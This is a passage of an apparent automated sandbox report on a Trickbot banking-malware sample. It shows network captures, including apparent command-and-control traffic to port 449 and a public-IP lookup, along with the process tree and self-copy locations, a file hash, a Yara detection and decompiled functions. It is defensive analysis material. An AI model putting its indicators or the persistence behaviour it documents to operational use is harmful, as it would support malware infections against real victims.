Oct 23, 2019 11:35:17.486155987 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.487457991 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:35:17.690907001 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.697981119 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:35:32.525871038 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:35:32.738328934 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:35:34.112720013 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:35:34.324527979 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:35:52.529810905 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:35:52.533471107 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:35:52.744446993 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:35:58.578116894 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:35:58.670531034 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:35:58.881418943 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:36:07.779083014 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:36:07.786429882 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:36:07.998950958 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:36:14.846693039 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:36:14.846764088 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:36:14.847223043 CEST	49163	449	192.168.1.16	81.190.160.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2019 11:34:33.497194052 CEST	53666	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:34:33.520772934 CEST	53	53666	8.8.8.8	192.168.1.16
Oct 23, 2019 11:34:34.488578081 CEST	53666	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:34:34.512100935 CEST	53	53666	8.8.8.8	192.168.1.16
Oct 23, 2019 11:34:35.488744974 CEST	53666	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:34:35.512242079 CEST	53	53666	8.8.8.8	192.168.1.16
Oct 23, 2019 11:34:37.488519907 CEST	53666	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:34:37.512154102 CEST	53	53666	8.8.8.8	192.168.1.16
Oct 23, 2019 11:34:41.488066912 CEST	53666	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:34:41.511527061 CEST	53	53666	8.8.8.8	192.168.1.16
Oct 23, 2019 11:35:16.820647001 CEST	63322	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:35:16.852674007 CEST	53	63322	8.8.8.8	192.168.1.16
Oct 23, 2019 11:35:16.879141092 CEST	63801	53	192.168.1.16	8.8.8.8
Oct 23, 2019 11:35:16.902837992 CEST	53	63801	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 23, 2019 11:35:16.820647001 CEST	192.168.1.16	8.8.8.8	0x894d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.879141092 CEST	192.168.1.16	8.8.8.8	0xd359	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.229.94	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.83.153	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.243.154	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.73.124	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		174.129.199.232	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.92.64	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.187.248	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.852674007 CEST	8.8.8.8	192.168.1.16	0x894d	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.147.226	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.73.124	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.243.154	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.218.16	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.83.153	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.23.229.94	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.92.64	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.187.248	A (IP address)	IN (0x0001)
Oct 23, 2019 11:35:16.902837992 CEST	8.8.8.8	192.168.1.16	0xd359	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.147.226	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After
Oct 23, 2019 11:35:17.197134018 CEST	23.23.229.94	443	192.168.1.16	49164	CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Wed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue May 30 12:48:38 CEST 2000 Tue May 30 12:48:38 CEST 2000	Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Sat May 30 12:48:38 CEST 2020 Sat May 30 12:48:38 CEST 2020
					CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Feb 12 01:00:00 CET 2014	Mon Feb 12 00:59:59 CET 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020
					CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe PID: 3188 Parent PID: 2528

General

Start time:	11:33:30
Start date:	23/10/2019
Path:	C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe'
Imagebase:	0x400000
File size:	512000 bytes
MD5 hash:	0A8D5A301D1EA44D5721045EEA07FDCD
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ??????.exe PID: 3232 Parent PID: 3188

General

Start time:	11:33:31
Start date:	23/10/2019
Path:	C:\ProgramData\??????.exe
Wow64 process (32bit):	false
Commandline:	'C:\ProgramData\??????.exe'
Imagebase:	0x400000
File size:	512000 bytes
MD5 hash:	0A8D5A301D1EA44D5721045EEA07FDCD
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ??????.exe PID: 3448 Parent PID: 1512

General

Start time:	11:34:08
Start date:	23/10/2019
Path:	C:\Users\user\AppData\Roaming\HomeLan\??????.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\HomeLan\??????.exe
Imagebase:	0x400000
File size:	512000 bytes
MD5 hash:	0A8D5A301D1EA44D5721045EEA07FDCD
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Trickbot_1, Description: Yara detected Trickbot, Source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe PID: 3188 Parent PID: 2528 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeCOMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	633
Total number of Limit Nodes:	23

Executed Functions

Function 00432740, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00432740() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x44b2f8;
				_t18 = GetVersion();
				 *0x0044B34C = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x0044B350 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x0044B354 = _t19;
				 *0x0044B358 = _t40 - _t19;
				 *0x0044B35C = _t19;
				 *0x0044B360 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x44b360)) = _t28 + 1;
				}
				E0041CBB0(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E0041CB6C(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}

0x004327b5
0x004327b7
0x004327ce
0x004327d8
0x004327db
0x004327dd
0x004327de
0x004327e5
0x004327e8
0x004327eb
0x004327ee
0x004327f1
0x004327f4
0x004327ff
0x00432802
0x00432802
0x00432807
0x0043280e
0x00432811
0x0043282a
0x0043282f
0x00432837
0x0043283a
0x00432841
0x00432842
0x00432845
0x0043284c

APIs

GetVersion.KERNEL32(?,?,?,0043273B), ref: 004327B7
GetProcessVersion.KERNELBASE(00000000,?,?,?,0043273B), ref: 004327F4
LoadCursorA.USER32(00000000,00007F02), ref: 00432822
LoadCursorA.USER32(00000000,00007F00), ref: 0043282D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 8a5051f1ed75182f01f0a67070f95fb9b0ac16b6985a4add2b8df3fbe6d2daf8
Instruction ID: f323f69644bcdc42c1d938070534c4365bcbfff97e1d805a440205eadf2d6d13
Opcode Fuzzy Hash: 8a5051f1ed75182f01f0a67070f95fb9b0ac16b6985a4add2b8df3fbe6d2daf8
Instruction Fuzzy Hash: 9A118FB1A047108FD728DF3A988452ABBE5FB487047504D3FE187C7B80D7B8E4408B98

Uniqueness

Uniqueness Score: -1.00%

Function 00409A06, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A06() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E004099C0); // executed
				 *0x44b950 = _t1;
				return _t1;
			}

0x00409a0b
0x00409a11
0x00409a16

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000099C0), ref: 00409A0B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8ad94d2ad42983138bf53cacd1314b51b83cc3874294e77523f7ae6984331b77
Instruction ID: fd76e86587670657feed25afd086b1f7d2776c4e965921a1bf4a8f8e34d2658b
Opcode Fuzzy Hash: 8ad94d2ad42983138bf53cacd1314b51b83cc3874294e77523f7ae6984331b77
Instruction Fuzzy Hash: A1A022F8082202CBCF002F30AC0C2003F20F202302B00803FE800A03A0CBF00800CA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00433712, Relevance: 35.3, APIs: 4, Strings: 16, Instructions: 341
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00433712(void* __ecx, void* __edi) {
				void* __esi;
				char* _t131;
				intOrPtr* _t135;
				void* _t137;
				char* _t146;
				intOrPtr _t164;
				char* _t171;
				long _t174;
				intOrPtr _t190;
				intOrPtr _t193;
				char* _t204;
				struct HICON__* _t207;
				void* _t242;
				intOrPtr* _t258;
				void* _t261;
				struct HICON__* _t263;
				char* _t264;
				char* _t265;
				void* _t268;
				void* _t269;
				void* _t271;
				void* _t272;

				E00405340(E00438910, _t269);
				_t272 = _t271 - 0x34;
				_t131 =  *0x447478; // 0x44748c
				_t261 = __ecx;
				 *(_t269 - 0x30) = _t131;
				 *(_t269 - 0x14) = _t131;
				 *(_t269 - 4) = 0;
				 *(_t269 - 4) = 1;
				E0041DA3F(_t261,  *(E00432562() + 8), _t269 - 0x30); // executed
				_t135 =  *((intOrPtr*)(_t261 + 8));
				 *(_t269 - 0x38) = 1;
				if(_t135 == 0) {
					L40:
					 *(_t269 - 4) = 0;
					E00417EC8(_t269 - 0x14);
					 *(_t269 - 4) =  *(_t269 - 4) | 0xffffffff;
					_t137 = E00417EC8(_t269 - 0x30);
					 *[fs:0x0] =  *((intOrPtr*)(_t269 - 0xc));
					return _t137;
				}
				while(1) {
					_t258 =  *((intOrPtr*)(_t135 + 8));
					 *((intOrPtr*)(_t269 - 0x3c)) =  *_t135;
					E00417C3D(_t269 - 0x1c, _t269 - 0x30);
					 *(_t269 - 4) = 2;
					E00417C3D(_t269 - 0x28, _t269 - 0x30);
					 *(_t269 - 4) = 3;
					E00417C3D(_t269 - 0x24, _t269 - 0x30);
					 *(_t269 - 4) = 4;
					E00417C3D(_t269 - 0x2c, _t269 - 0x30);
					if( *((intOrPtr*)(_t269 + 8)) != 0) {
						_t204 =  *0x447478; // 0x44748c
						 *(_t269 - 0x34) = _t204;
						 *(_t269 - 4) = 6;
						_t207 = ExtractIconA( *(E00432562() + 8),  *(_t269 - 0x30),  *(_t269 - 0x38)); // executed
						_t263 = _t207;
						if(_t263 == 0) {
							E004155CC(_t269 - 0x34, ",%d", 0);
							_t272 = _t272 + 0xc;
						} else {
							E004155CC(_t269 - 0x34, ",%d",  *(_t269 - 0x38));
							_t272 = _t272 + 0xc;
							DestroyIcon(_t263);
						}
						E004181DF(_t269 - 0x2c, _t269 - 0x34);
						 *(_t269 - 4) = 5;
						E00417EC8(_t269 - 0x34);
					}
					_t146 =  *0x447478; // 0x44748c
					 *(_t269 - 0x18) = _t146;
					 *(_t269 - 0x10) = _t146;
					 *(_t269 - 0x20) = _t146;
					_push(5);
					_push(_t269 - 0x10);
					 *(_t269 - 4) = 9;
					if( *((intOrPtr*)( *_t258 + 0x64))() == 0 ||  *((intOrPtr*)( *(_t269 - 0x10) - 8)) == 0) {
						goto L38;
					}
					_push(6);
					_push(_t269 - 0x20);
					if( *((intOrPtr*)( *_t258 + 0x64))() == 0) {
						E00417FB5(_t269 - 0x20, _t269, _t269 - 0x10);
					}
					if(E004333DA( *(_t269 - 0x10),  *(_t269 - 0x20), 0) != 0) {
						if( *((intOrPtr*)(_t269 + 8)) == 0) {
							L15:
							_push(0);
							_push(_t269 - 0x14);
							if( *((intOrPtr*)( *_t258 + 0x64))() == 0 ||  *((intOrPtr*)( *(_t269 - 0x14) - 8)) == 0) {
								_t264 = "ddeexec";
								_push(_t264);
								E004155CC(_t269 - 0x14, "%s\\shell\\open\\%s",  *(_t269 - 0x10));
								_t272 = _t272 + 0x10;
								_t164 = E004333DA( *(_t269 - 0x14), "[open(\"%1\")]", 0);
								__eflags = _t164;
								if(_t164 == 0) {
									goto L38;
								}
								__eflags =  *((intOrPtr*)(_t269 + 8));
								if( *((intOrPtr*)(_t269 + 8)) == 0) {
									_push(" \"%1\"");
									_t242 = _t269 - 0x1c;
									goto L26;
								}
								_push(_t264);
								E004155CC(_t269 - 0x14, "%s\\shell\\print\\%s",  *(_t269 - 0x10));
								_t272 = _t272 + 0x10;
								_t190 = E004333DA( *(_t269 - 0x14), "[print(\"%1\")]", 0);
								__eflags = _t190;
								if(_t190 == 0) {
									goto L38;
								}
								_push(_t264);
								E004155CC(_t269 - 0x14, "%s\\shell\\printto\\%s",  *(_t269 - 0x10));
								_t272 = _t272 + 0x10;
								_t193 = E004333DA( *(_t269 - 0x14), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0);
								__eflags = _t193;
								if(_t193 == 0) {
									goto L38;
								}
								_t268 = " /dde";
								E004181A3(_t269 - 0x1c, _t268);
								E004181A3(_t269 - 0x28, _t268);
								_push(_t268);
								goto L24;
							} else {
								E004181A3(_t269 - 0x1c, " \"%1\"");
								if( *((intOrPtr*)(_t269 + 8)) == 0) {
									L27:
									_t265 = "command";
									_push(_t265);
									E004155CC(_t269 - 0x14, "%s\\shell\\open\\%s",  *(_t269 - 0x10));
									_t272 = _t272 + 0x10;
									if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x1c)), 0) == 0) {
										goto L38;
									}
									if( *((intOrPtr*)(_t269 + 8)) == 0) {
										L31:
										 *((intOrPtr*)( *_t258 + 0x64))(_t269 - 0x18, 4);
										_t171 =  *(_t269 - 0x18);
										_t290 =  *((intOrPtr*)(_t171 - 8));
										if( *((intOrPtr*)(_t171 - 8)) == 0) {
											goto L38;
										}
										 *(_t269 - 0x40) = 0x208;
										_t174 = RegQueryValueA(0x80000000, _t171, E004181F7(_t269 - 0x14, _t269, 0x208), _t269 - 0x40);
										E00418246(_t269 - 0x14, _t290, 0xffffffff);
										if(_t174 != 0) {
											L35:
											if(E004333DA( *(_t269 - 0x18),  *(_t269 - 0x10), 0) != 0 &&  *((intOrPtr*)(_t269 + 8)) != 0) {
												E004155CC(_t269 - 0x14, "%s\\ShellNew",  *(_t269 - 0x18));
												_t272 = _t272 + 0xc;
												E004333DA( *(_t269 - 0x14), 0x43e0b8, "NullFile");
											}
											goto L38;
										}
										_t180 =  *(_t269 - 0x14);
										if( *((intOrPtr*)( *(_t269 - 0x14) - 8)) == 0 || E0040504F(_t180,  *(_t269 - 0x10)) == 0) {
											goto L35;
										} else {
											goto L38;
										}
									}
									_push(_t265);
									E004155CC(_t269 - 0x14, "%s\\shell\\print\\%s",  *(_t269 - 0x10));
									_t272 = _t272 + 0x10;
									if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x28)), 0) == 0) {
										goto L38;
									}
									_push(_t265);
									E004155CC(_t269 - 0x14, "%s\\shell\\printto\\%s",  *(_t269 - 0x10));
									_t272 = _t272 + 0x10;
									if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x24)), 0) == 0) {
										goto L38;
									}
									goto L31;
								}
								E004181A3(_t269 - 0x28, " /p \"%1\"");
								_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
								L24:
								_t242 = _t269 - 0x24;
								L26:
								E004181A3(_t242);
								goto L27;
							}
						}
						E004155CC(_t269 - 0x14, "%s\\DefaultIcon",  *(_t269 - 0x10));
						_t272 = _t272 + 0xc;
						if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x2c)), 0) == 0) {
							goto L38;
						}
						goto L15;
					}
					L38:
					 *(_t269 - 4) = 8;
					E00417EC8(_t269 - 0x20);
					 *(_t269 - 4) = 7;
					E00417EC8(_t269 - 0x10);
					 *(_t269 - 4) = 5;
					E00417EC8(_t269 - 0x18);
					 *(_t269 - 4) = 4;
					E00417EC8(_t269 - 0x2c);
					 *(_t269 - 4) = 3;
					E00417EC8(_t269 - 0x24);
					 *(_t269 - 4) = 2;
					E00417EC8(_t269 - 0x28);
					 *(_t269 - 4) = 1;
					E00417EC8(_t269 - 0x1c);
					 *(_t269 - 0x38) =  *(_t269 - 0x38) + 1;
					if( *((intOrPtr*)(_t269 - 0x3c)) != 0) {
						_t135 =  *((intOrPtr*)(_t269 - 0x3c));
						continue;
					}
					goto L40;
				}
			}

0x00433717
0x0043371c
0x0043371f
0x00433726
0x00433728
0x0043372d
0x00433730
0x00433733
0x00433744
0x00433749
0x0043374c
0x00433755
0x00433b28
0x00433b2b
0x00433b2e
0x00433b33
0x00433b3a
0x00433b44
0x00433b4c
0x00433b4c
0x00433761
0x00433763
0x00433769
0x00433770
0x0043377c
0x00433780
0x0043378c
0x00433790
0x0043379c
0x004337a0
0x004337a8
0x004337aa
0x004337af
0x004337b2
0x004337c5
0x004337cb
0x004337cf
0x004337f8
0x004337fd
0x004337d1
0x004337dd
0x004337e2
0x004337e6
0x004337e6
0x00433807
0x0043380f
0x00433813
0x00433813
0x00433818
0x0043381d
0x00433820
0x00433823
0x0043382b
0x0043382d
0x00433830
0x00433839
0x00000000
0x00000000
0x00433850
0x00433852
0x0043385a
0x00433863
0x00433863
0x00433876
0x0043387f
0x004338a9
0x004338ae
0x004338af
0x004338b7
0x004338ee
0x004338f6
0x00433900
0x00433905
0x00433911
0x00433916
0x00433918
0x00000000
0x00000000
0x0043391e
0x00433921
0x00433996
0x0043399b
0x00000000
0x0043399b
0x00433923
0x00433930
0x00433935
0x00433941
0x00433946
0x00433948
0x00000000
0x00000000
0x0043394e
0x0043395b
0x00433960
0x0043396c
0x00433971
0x00433973
0x00000000
0x00000000
0x00433979
0x00433982
0x0043398b
0x00433990
0x00000000
0x004338c1
0x004338c9
0x004338d1
0x004339a3
0x004339a3
0x004339ab
0x004339b5
0x004339ba
0x004339cb
0x00000000
0x00000000
0x004339d4
0x00433a28
0x00433a32
0x00433a35
0x00433a38
0x00433a3b
0x00000000
0x00000000
0x00433a4c
0x00433a5f
0x00433a6c
0x00433a73
0x00433a8c
0x00433a9a
0x00433aad
0x00433ab2
0x00433ac2
0x00433ac2
0x00000000
0x00433a9a
0x00433a75
0x00433a7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00433a7b
0x004339d6
0x004339e3
0x004339e8
0x004339f9
0x00000000
0x00000000
0x004339ff
0x00433a0c
0x00433a11
0x00433a22
0x00000000
0x00000000
0x00000000
0x00433a22
0x004338df
0x004338e4
0x00433991
0x00433991
0x0043399e
0x0043399e
0x00000000
0x0043399e
0x004338b7
0x0043388d
0x00433892
0x004338a3
0x00000000
0x00000000
0x00000000
0x004338a3
0x00433ac7
0x00433aca
0x00433ace
0x00433ad6
0x00433ada
0x00433ae2
0x00433ae6
0x00433aee
0x00433af2
0x00433afa
0x00433afe
0x00433b06
0x00433b0a
0x00433b12
0x00433b16
0x00433b1b
0x00433b21
0x0043375e
0x00000000
0x0043375e
0x00000000
0x00433b27

APIs

__EH_prolog.LIBCMT ref: 00433717

Part of subcall function 0041DA3F: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
Part of subcall function 0041DA3F: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71

Part of subcall function 00417C3D: InterlockedIncrement.KERNEL32(?), ref: 00417C52

ExtractIconA.SHELL32(?,?,00000001), ref: 004337C5
DestroyIcon.USER32(00000000), ref: 004337E6

Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259

RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 00433A5F

Strings

%s\shell\open\%s, xrefs: 004338FA, 004339AF
[open("%1")], xrefs: 00433909
,%d, xrefs: 004337D7, 004337F2
NullFile, xrefs: 00433AB5
[print("%1")], xrefs: 00433939
%s\DefaultIcon, xrefs: 00433887
/pt "%1" "%2" "%3" "%4", xrefs: 004338E4
ddeexec, xrefs: 004338EE, 004338F6, 00433923, 0043394E
%s\shell\printto\%s, xrefs: 00433955, 00433A06
/dde, xrefs: 00433979, 00433981, 00433987, 00433990
/p "%1", xrefs: 004338D7
command, xrefs: 004339A3, 004339AB, 004339D6, 004339FF
%s\shell\print\%s, xrefs: 0043392A, 004339DD
[printto("%1","%2","%3","%4")], xrefs: 00433964
"%1", xrefs: 004338C1, 00433996
%s\ShellNew, xrefs: 00433AA7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: IconName$DestroyExtractFileH_prologIncrementInterlockedModulePathQueryShortValuelstrlen
